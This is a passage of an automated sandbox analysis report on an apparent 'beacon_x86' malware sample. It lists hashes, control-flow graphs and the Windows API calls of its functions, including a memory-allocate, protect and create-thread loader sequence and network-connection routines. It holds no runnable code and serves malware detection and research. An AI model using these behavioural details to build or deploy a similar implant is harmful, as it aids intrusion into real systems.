          • Opcode Fuzzy Hash: 6298e278e507f0f3f167548c9fb139467626c16076945c46857cd9897571e720
          • Instruction Fuzzy Hash: C4F08C36E14268B7EF208A959C09F8E7A6DEB44754F204051FA02E6144C271AA00A7B4
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890928237.0000000003E00000.00000020.00000800.00020000.00000000.sdmp, Offset: 03E00000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_3e00000_beacon_x86.jbxd
          Similarity
          • API ID: Sleep
          • String ID:
          • API String ID: 3472027048-0
          • Opcode ID: 7a0e62f61d2487343c68d546d0fed2b5e277ec55e342f27ca8efb465afa3f918
          • Instruction ID: b5bc2749f3442b147237d450751f7bd0ac3bf00c36e88939ed5271c18634c1d2
          • Opcode Fuzzy Hash: 7a0e62f61d2487343c68d546d0fed2b5e277ec55e342f27ca8efb465afa3f918
          • Instruction Fuzzy Hash: 5C419E35600601DFCB15CF1DC980B69BBB2FF89354B19D5AEE49A8B252D631EE81CB50
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID:
          • String ID: p=v
          • API String ID: 0-1262632170
          • Opcode ID: 2fb173a1a8bea6bdf5408ec5933e9d78f1c2c007f9953934f0675fa25691a93a
          • Instruction ID: d347b904215d0f4f455e1e915ed422bb1df3db5823aaa054e5f57bd332fc7694
          • Opcode Fuzzy Hash: 2fb173a1a8bea6bdf5408ec5933e9d78f1c2c007f9953934f0675fa25691a93a
          • Instruction Fuzzy Hash: 99D0123220D2489ADA51EB14FCC25797310E740311F908EA9E90D025457E66A9655671

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 0 401805-4018b9 GetTickCount sprintf CreateThread
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890235844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.3890220060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890251384.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890265739.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890295487.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890310517.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: CountCreateThreadTicksprintf
          • String ID: .$\$\$\$\$e$i$p$p
          • API String ID: 1367138260-609229641
          • Opcode ID: 6993ad00b22fa5709ddfae83127fd071b9715a62268548fc0a47211300f561df
          • Instruction ID: 85e9528532d9762a1f7b070758f0f1347f94744085bed28000c50463c0499d60
          • Opcode Fuzzy Hash: 6993ad00b22fa5709ddfae83127fd071b9715a62268548fc0a47211300f561df
          • Instruction Fuzzy Hash: E50160B4408701DFE3009F16D55C31BBEE1AB84749F00891DE5991A2A1C7BE864CCF9A

          Control-flow Graph

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$CountCurrentProcessTick__getptd
          • String ID:
          • API String ID: 2210316817-0
          • Opcode ID: 77b45978b50acb1ce2f672c6abd29de1f346992eddda3b7c4cfa5f299cd6b205
          • Instruction ID: c53c75d157ba0bb2cadbdc629fc11144fe4978c858261f09f5efdccae1f57757
          • Opcode Fuzzy Hash: 77b45978b50acb1ce2f672c6abd29de1f346992eddda3b7c4cfa5f299cd6b205
          • Instruction Fuzzy Hash: 7531B376900308BBDB11BBB5EC46EAE7BB8DF08324F184016F504EB292EE75D9848771

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 361 d67e51-d67e6e 362 d67e80-d67e82 361->362 363 d67e70-d67e75 call d777ff 361->363 365 d67e88 362->365 366 d67f99-d67fa0 362->366 367 d67e7a-d67e7b 363->367 368 d67e8d-d67e91 365->368 367->362 369 d67e97-d67e9f 368->369 370 d67f8e-d67f93 368->370 371 d67ea1-d67ed9 htonl recvfrom 369->371 372 d67f0e-d67f30 htonl ioctlsocket 369->372 370->366 370->368 373 d67ef2-d67ef4 371->373 374 d67edb-d67ee6 WSAGetLastError 371->374 375 d67f35-d67f38 372->375 376 d67f32 372->376 373->370 378 d67efa-d67f0c 373->378 374->370 377 d67eec-d67ef0 374->377 379 d67f5a-d67f5b 375->379 380 d67f3a-d67f3e 375->380 376->375 381 d67f5c-d67f6e call d602d0 377->381 382 d67f83-d67f8b call d602d0 378->382 379->381 380->370 383 d67f40-d67f58 call d674d4 380->383 381->370 382->370 383->379 390 d67f70-d67f75 383->390 390->370 391 d67f77-d67f7d 390->391 391->382
          APIs
          • _malloc.LIBCMT ref: 00D67E75
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          • htonl.WS2_32(00D9F838), ref: 00D67EA1
          • recvfrom.WS2_32(?,00D9F838,000FFFFC,00000000,?,?), ref: 00D67ED0
          • WSAGetLastError.WS2_32 ref: 00D67EDB
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: AllocateErrorHeapLast_mallochtonlrecvfrom
          • String ID:
          • API String ID: 987280018-0
          • Opcode ID: 07a40dc80aa8edb40906ed7ee7b59ab050936193d8c85fccd95526aa025e4969
          • Instruction ID: 3f86008b5b4c5539288eec971eb8b031d008c3f3e2dc30b47be9571463b9e50c
          • Opcode Fuzzy Hash: 07a40dc80aa8edb40906ed7ee7b59ab050936193d8c85fccd95526aa025e4969
          • Instruction Fuzzy Hash: 1641E271808208EFEB219FA4DC44FAAB7F5EF44328F24426AF511E22A0D770AD45CB71

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 392 d6031c-d60427 call d671bc call d67382 * 3 call d6b2f3 call d6b2dd call d6b2e8 call d6b2f3 * 2 call d777ff call d6b2e8 * 3 call d6b2dd call d6bb1c call d64c3e call d6da37 * 2 call d6286e 431 d6042e-d60441 call d6b2e8 call d628b1 392->431 432 d60429 call d6ce47 392->432 438 d60443 call d6ce47 431->438 439 d60448-d6044f call d628cc 431->439 432->431 438->439 443 d60456-d6045d call d62927 439->443 444 d60451 call d6ce47 439->444 448 d60464-d60494 call d6b2dd call d6b2e8 call d777ff 443->448 449 d6045f call d6ce47 443->449 444->443 457 d60496 call d6ce47 448->457 458 d6049b-d604c6 call d6b2e8 call d6da37 call d6b2e8 call d67060 448->458 449->448 457->458 468 d604c7-d604c8 458->468 469 d604ce-d6053e call d6bdfa call d77956 call d6bdfa call d77956 * 2 call d64c6a 468->469 470 d606ac-d606ca call d6bea0 call d77722 call d6ce47 468->470 489 d60540-d60545 469->489 490 d6055f-d60592 call d6173c call d6b2e8 call d61e3d 469->490 492 d60548-d6054d 489->492 502 d60594-d605a2 call d6acc5 490->502 503 d605bd-d605c0 490->503 492->492 494 d6054f-d60551 492->494 494->490 496 d60553-d6055e call d65072 494->496 496->490 511 d605a4-d605b0 call d6936c 502->511 512 d605b2-d605b5 502->512 504 d605c2 call d67fa1 503->504 505 d60628 503->505 510 d605c7-d605d1 call d6b2e8 504->510 509 d60630-d6063c call d61874 call d6286e 505->509 523 d60643-d60657 call d6be28 509->523 524 d6063e call d6ce47 509->524 520 d605d3-d605d8 510->520 521 d605da 510->521 511->503 512->503 525 d605df-d605f6 call d63f55 call d66853 call d66017 call d6286e 520->525 521->525 531 d6065e-d60666 523->531 532 d60659 call d6ce47 523->532 524->523 551 d605fd-d60604 525->551 552 d605f8 call d61fb7 525->552 531->470 535 d60668-d6066f 531->535 532->531 537 d60671-d6067f 535->537 538 d6069a-d6069b call d644a0 535->538 541 d60692 537->541 542 d60681 call d6200f 537->542 544 d606a0-d606a7 538->544 546 d60694-d60696 541->546 548 d60686-d60690 542->548 544->468 546->538 549 d60698 546->549 548->546 549->538 551->509 554 d60606-d60626 call d61874 call d6173c call d61962 551->554 552->551 554->509
          APIs
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671C2
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671D2
          • _malloc.LIBCMT ref: 00D603B2
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
            • Part of subcall function 00D6BB1C: __time64.LIBCMT ref: 00D6BB28
            • Part of subcall function 00D6BB1C: _malloc.LIBCMT ref: 00D6BB71
            • Part of subcall function 00D6BB1C: _memset.LIBCMT ref: 00D6BB8F
            • Part of subcall function 00D6BB1C: _strtok.LIBCMT ref: 00D6BBB4
            • Part of subcall function 00D6BB1C: _strtok.LIBCMT ref: 00D6BBE6
            • Part of subcall function 00D64C3E: __time64.LIBCMT ref: 00D64C4B
            • Part of subcall function 00D6DA37: _malloc.LIBCMT ref: 00D6DA5E
            • Part of subcall function 00D6DA37: _memset.LIBCMT ref: 00D6DA8C
            • Part of subcall function 00D6DA37: _realloc.LIBCMT ref: 00D6DA6D
          • _malloc.LIBCMT ref: 00D60486
          • __snprintf.LIBCMT ref: 00D604E8
          • __snprintf.LIBCMT ref: 00D60507
          • __snprintf.LIBCMT ref: 00D60525
            • Part of subcall function 00D6CE47: Sleep.KERNEL32(000003E8,00000000,00000000,00000080,00D606C4), ref: 00D6CE84
            • Part of subcall function 00D6CE47: RtlExitUserThread.NTDLL(00000000,00000000,00000000,00000080,00D606C4), ref: 00D6CE8E
            • Part of subcall function 00D6CE47: WaitForSingleObject.KERNEL32(00000000,00000000,00000080,00D606C4), ref: 00D6CEAF
            • Part of subcall function 00D6173C: InternetOpenA.WININET(?,00000003,00000000,00000000,00000000), ref: 00D617C2
            • Part of subcall function 00D6173C: InternetConnectA.WININET(?,?,00000000,00000000,00000003,00000000,00D9EFC4), ref: 00D61809
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _malloc$__snprintf$Internet__time64_memset_strtok$AllocateConnectExitHeapObjectOpenSingleSleepThreadUserWait_realloc
          • String ID:
          • API String ID: 2723191398-0
          • Opcode ID: 4d87c748305ec9c4fee3743e30dd96e15338379b32e7116747cff0bdf3e8d228
          • Instruction ID: 52c5faac091d1ac11094eeaf512a0cccbf09f1261205c6538164fd06fb80db18
          • Opcode Fuzzy Hash: 4d87c748305ec9c4fee3743e30dd96e15338379b32e7116747cff0bdf3e8d228
          • Instruction Fuzzy Hash: 5B9105719483006BD6207B759C03B2F7BE8EF84724F14091AF588EA2D2EF75CD408AB6

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 561 40156c-40159d VirtualAlloc 562 40159f-4015a1 561->562 563 4015a3-4015b8 562->563 564 4015ba-40161b call 401539 VirtualProtect CreateThread 562->564 563->562
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890235844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.3890220060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890251384.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890265739.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890295487.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890310517.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: Virtual$AllocCreateProtectThread
          • String ID:
          • API String ID: 3039780055-3916222277
          • Opcode ID: 7116a479f18e8398ab62b384885a83961a77cbf5e6f43067b0417bc4564eeb7b
          • Instruction ID: e62f9da5006a8b60ac6d7aa8aa559fb842e3793d0c2f75f38c45ec490f2c7fc1
          • Opcode Fuzzy Hash: 7116a479f18e8398ab62b384885a83961a77cbf5e6f43067b0417bc4564eeb7b
          • Instruction Fuzzy Hash: FD1148B0408304AFD700AF25C48835EBFF4EB88358F40C86EE9998B391D37984098B92

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 567 d8511c-d8512f call d7a3a4 570 d8515f-d8516a 567->570 571 d85131-d8513e 567->571 573 d8516c-d8516e 570->573 574 d8516f-d85177 570->574 571->570 572 d85140-d85155 call d79641 call d7b5da 571->572 598 d85158-d8515a 572->598 573->574 575 d85179-d85180 574->575 576 d851e2-d851e4 574->576 580 d851cd-d851cf 575->580 581 d85182-d85194 575->581 578 d85232 576->578 579 d851e6-d851ec 576->579 586 d85234-d85239 call d7a3e9 578->586 583 d851ee-d851f7 call d7a77f 579->583 584 d85221-d85223 579->584 580->578 588 d851d1-d851e0 RtlAllocateHeap 580->588 581->580 585 d85196-d851be call d798aa call d7a0bc call d85218 581->585 583->574 599 d851fd-d85202 583->599 584->578 591 d85225-d8522a 584->591 585->588 605 d851c0-d851ca call d7f520 585->605 588->576 591->578 596 d8522c 591->596 596->578 598->586 599->598 601 d85208-d8520e 599->601 601->598 605->580
          APIs
          • __lock.LIBCMT ref: 00D85198
          • ___sbh_alloc_block.LIBCMT ref: 00D851A4
          • _memset.LIBCMT ref: 00D851C5
          • RtlAllocateHeap.NTDLL(00000008,?,00D92A60), ref: 00D851DA
            • Part of subcall function 00D79641: __getptd_noexit.LIBCMT ref: 00D79641
            • Part of subcall function 00D7B5DA: __decode_pointer.LIBCMT ref: 00D7B5E5
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: AllocateHeap___sbh_alloc_block__decode_pointer__getptd_noexit__lock_memset
          • String ID:
          • API String ID: 3771094184-0
          • Opcode ID: 6f402446c9fda7c28814a394659092e83d4457745665258b7121ff971ab6ad03
          • Instruction ID: 7a731ad8a0da64dc45584a48f7e0bd8b4c8718837b770e6dff36288635d2f8e2
          • Opcode Fuzzy Hash: 6f402446c9fda7c28814a394659092e83d4457745665258b7121ff971ab6ad03
          • Instruction Fuzzy Hash: 8221F871900B04ABCF21BF68EC84B5E77A1EB81760F288215F86D9F299E7318D408B75

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 623 401296-4012a2 625 4012a4 623->625 626 4012b8-4012c5 623->626 627 4012a8-4012b1 625->627 630 4012c7-4012d0 626->630 631 4012db-4012fb malloc 626->631 627->626 629 4012b3-4012b6 627->629 629->626 629->627 632 4012d6 630->632 633 4013b8-4013bc 630->633 634 401301-40130d 631->634 635 401483 631->635 632->631 633->632 636 401310-401344 strlen malloc memcpy 634->636 638 40148b-40149a exit 635->638 636->636 637 401346-401393 call 401960 call 4029e0 636->637 637->638 643 401399-4013a1 637->643 644 4013a7-4013b2 643->644 645 401448-40145d _cexit 643->645
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890235844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.3890220060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890251384.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890265739.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890295487.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890310517.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: malloc$memcpystrlen
          • String ID:
          • API String ID: 3553820921-0
          • Opcode ID: 948a088ca798df2e7dce449238bcaf35f26902c4bc7ea522de66c663b67a1438
          • Instruction ID: 2b272e4b46966ba8deed0fafeb192a19a89914a185c4b83b395d914033f718ae
          • Opcode Fuzzy Hash: 948a088ca798df2e7dce449238bcaf35f26902c4bc7ea522de66c663b67a1438
          • Instruction Fuzzy Hash: CB3136B9A003058FCB10DF65E98075ABBF1FB44705F14853ED988A73A2E778E945CB89
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890235844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.3890220060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890251384.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890265739.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890295487.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890310517.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: malloc$memcpystrlen
          • String ID:
          • API String ID: 3553820921-0
          • Opcode ID: f5e0c9adc78a94dab72ef4a8ccb92d4597cac7524235f195ea0d1421677b0eb4
          • Instruction ID: 9b3cccf6e9dd94e7ac684493c2e87501ce7787e5f0140ca7f17ca5cac32b3744
          • Opcode Fuzzy Hash: f5e0c9adc78a94dab72ef4a8ccb92d4597cac7524235f195ea0d1421677b0eb4
          • Instruction Fuzzy Hash: EF2112B8A003058FCB10DF69E880659BBF0FB48705F10843ED988A73A2E774A945CB89
          APIs
            • Part of subcall function 00D61E6E: WSAStartup.WS2_32(00000202,?), ref: 00D61E8F
            • Part of subcall function 00D61E6E: WSACleanup.WS2_32 ref: 00D61E99
          • WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 00D61F3F
          • WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,?,00000000,00000000), ref: 00D61F6A
          • closesocket.WS2_32(00000000), ref: 00D61FA9
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CleanupIoctlSocketStartupclosesocket
          • String ID:
          • API String ID: 1100289767-0
          • Opcode ID: 40205f3e79af7936fb7c625739f3a144d8e9c7c9d77be54b017143f6e346c1c0
          • Instruction ID: 96aec82abb6b5ce3994d3ee241e2b98857468fea8fe3fe09f339dce1b8734720
          • Opcode Fuzzy Hash: 40205f3e79af7936fb7c625739f3a144d8e9c7c9d77be54b017143f6e346c1c0
          • Instruction Fuzzy Hash: 7D11E736A412187BE7208A65CC49FEB7F6DDF857A1F188022FA09D2181D775884186B0
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890235844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.3890220060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890251384.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890265739.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890295487.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890310517.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: File$CloseCreateHandleRead
          • String ID:
          • API String ID: 1035965006-0
          • Opcode ID: de8e7562ff60837e5b68acacff60a59f894b3ed398b1beaf9885a2a007807793
          • Instruction ID: 13578ad0072e5758c11d0cf9d06b5e6b01679b076f79182928bb53a60008478f
          • Opcode Fuzzy Hash: de8e7562ff60837e5b68acacff60a59f894b3ed398b1beaf9885a2a007807793
          • Instruction Fuzzy Hash: 811157B58083059FC700AF29C54835FBBF4EF84364F00892EE895973A2D3B989498FD6
          APIs
          • _malloc.LIBCMT ref: 00D671C2
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          • _malloc.LIBCMT ref: 00D671D2
          • _memset.LIBCMT ref: 00D671EF
            • Part of subcall function 00D77722: __lock.LIBCMT ref: 00D77740
            • Part of subcall function 00D77722: ___sbh_find_block.LIBCMT ref: 00D7774B
            • Part of subcall function 00D77722: ___sbh_free_block.LIBCMT ref: 00D7775A
            • Part of subcall function 00D77722: HeapFree.KERNEL32(00000000,?,00D925A0,0000000C,00D7988B,00000000,00D92700,0000000C,00D798C5,?,?,?,00D8519D,00000004,00D92A60,0000000C), ref: 00D7778A
            • Part of subcall function 00D77722: GetLastError.KERNEL32(?,00D8519D,00000004,00D92A60,0000000C,00D80868,?,?,00000000,00000000,00000000,?,00D7C749,00000001,00000214), ref: 00D7779B
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Heap_malloc$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__lock_memset
          • String ID:
          • API String ID: 1561657895-0
          • Opcode ID: c8e9cba292c0deaefcb227626c1a5d494f7b07ad7ba5e871b60a28f1e5f06bb6
          • Instruction ID: f84ccb30253143ec6081c95843bb62e7cb1e717d146f60e916add463210dfdb0
          • Opcode Fuzzy Hash: c8e9cba292c0deaefcb227626c1a5d494f7b07ad7ba5e871b60a28f1e5f06bb6
          • Instruction Fuzzy Hash: 1DE0923B60811937CA263A69DC12F9F2E1ACF867B4F248429F90C5A141EE11890152F5
          APIs
          • malloc.MSVCRT ref: 004017BB
          • Sleep.KERNELBASE ref: 004017C9
            • Part of subcall function 00401700: CreateFileA.KERNELBASE ref: 0040174D
            • Part of subcall function 00401700: ReadFile.KERNELBASE ref: 0040177D
            • Part of subcall function 00401700: CloseHandle.KERNEL32 ref: 0040178D
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890235844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.3890220060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890251384.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890265739.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890295487.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890310517.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: File$CloseCreateHandleReadSleepmalloc
          • String ID: (0@
          • API String ID: 4248373497-1619376425
          • Opcode ID: 6845ea8dd48fab404a2061b438f8f23c871c7f7415dcaaf50ff1d80553ea92f3
          • Instruction ID: c18dacc817dc4ff119a69da04305d567d0d6ae5b32f5fd65705d0832059cd44e
          • Opcode Fuzzy Hash: 6845ea8dd48fab404a2061b438f8f23c871c7f7415dcaaf50ff1d80553ea92f3
          • Instruction Fuzzy Hash: 9AF0F8B4A053009BC700EF7ADA8551ABBE8BB08345F41483DA684E7391D678D9008B1A
          APIs
          • InternetOpenA.WININET(?,00000003,00000000,00000000,00000000), ref: 00D617C2
          • InternetConnectA.WININET(?,?,00000000,00000000,00000003,00000000,00D9EFC4), ref: 00D61809
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Internet$ConnectOpen
          • String ID:
          • API String ID: 2790792615-0
          • Opcode ID: 4600c0c81b65e5040c9b2ba6ee14ac2c7018b4e2d675a474286dfd535db31956
          • Instruction ID: a55b671e104d52d6d2f3eb1a42486f73b916a55b56222a3a6c80350e0d67d988
          • Opcode Fuzzy Hash: 4600c0c81b65e5040c9b2ba6ee14ac2c7018b4e2d675a474286dfd535db31956
          • Instruction Fuzzy Hash: 6731C375580344BBEA356B26AC1BF6F3F6DEB85B20F18001BF600D91E1DFB589809A75
          APIs
          • WSAStartup.WS2_32(00000202,?), ref: 00D61E8F
          • WSACleanup.WS2_32 ref: 00D61E99
            • Part of subcall function 00D77EDE: _doexit.LIBCMT ref: 00D77EEA
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CleanupStartup_doexit
          • String ID:
          • API String ID: 3413891862-0
          • Opcode ID: 602fc413920f090239d4881da17fb1f8cebedb0955f0e248cc94b0841a861675
          • Instruction ID: 7a3a98242a292084aa6e01ee30bdcd71bf48f2f2e71b4687c9cc9cf9fe51b4a1
          • Opcode Fuzzy Hash: 602fc413920f090239d4881da17fb1f8cebedb0955f0e248cc94b0841a861675
          • Instruction Fuzzy Hash: 38016D71D4431497D724AF79BC167587BE8BB09B12F14012BF604CA2D1DB7482C1CBB9
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _calloc
          • String ID:
          • API String ID: 1679841372-0
          • Opcode ID: f1a631400b695e4e9ebeb96205b47cc74500cf8837b1979b1f339c8b83b988ec
          • Instruction ID: 2ee62540e63d471a0d78a538b2217a667209576defd476b2bb0659c06fe253b9
          • Opcode Fuzzy Hash: f1a631400b695e4e9ebeb96205b47cc74500cf8837b1979b1f339c8b83b988ec
          • Instruction Fuzzy Hash: CBA16BB1900608EFDF219F95DC45EEEBBB6FF89300F108159F545AA2A1E3729940DF20
          APIs
          • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,00D29E52,75920A60,?,?,?,?), ref: 00D2A3A9
          Memory Dump Source
          • Source File: 00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_3_d20000_beacon_x86.jbxd
          Yara matches
          Similarity
          • API ID: LibraryLoad
          • String ID:
          • API String ID: 1029625771-0
          • Opcode ID: 921837ef3eb67de63abac7cb5666c735ab802cdd6b7f1449a49ae73ad87c3da8
          • Instruction ID: dd5ec0ab6c139edab0c53bdb76bc107ec0d607d75d14ca60757d06b7ce583d9e
          • Opcode Fuzzy Hash: 921837ef3eb67de63abac7cb5666c735ab802cdd6b7f1449a49ae73ad87c3da8
          • Instruction Fuzzy Hash: D251B775A0021ADFCF08CF88D894AAEB7B2FF88304F148199E9156B351D734AE51CFA5
          APIs
          • HeapDestroy.KERNEL32(?), ref: 00D69874
            • Part of subcall function 00D6B67F: _memset.LIBCMT ref: 00D6B69D
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: DestroyHeap_memset
          • String ID:
          • API String ID: 3970643317-0
          • Opcode ID: d47c14b22fe64c818185b55c337edd60bc13cbb03a6c452a0cd28951b1408277
          • Instruction ID: 07779b6de0a3f1f53af445a77ca44f6eab8bd48dec0b99aa5d7ce9bc855622d3
          • Opcode Fuzzy Hash: d47c14b22fe64c818185b55c337edd60bc13cbb03a6c452a0cd28951b1408277
          • Instruction Fuzzy Hash: 6911C4328102059BDB24EB68D865EBEB76CDF23324F184026E44097155DB31ED81E6B0
          APIs
          • _malloc.LIBCMT ref: 00D64664
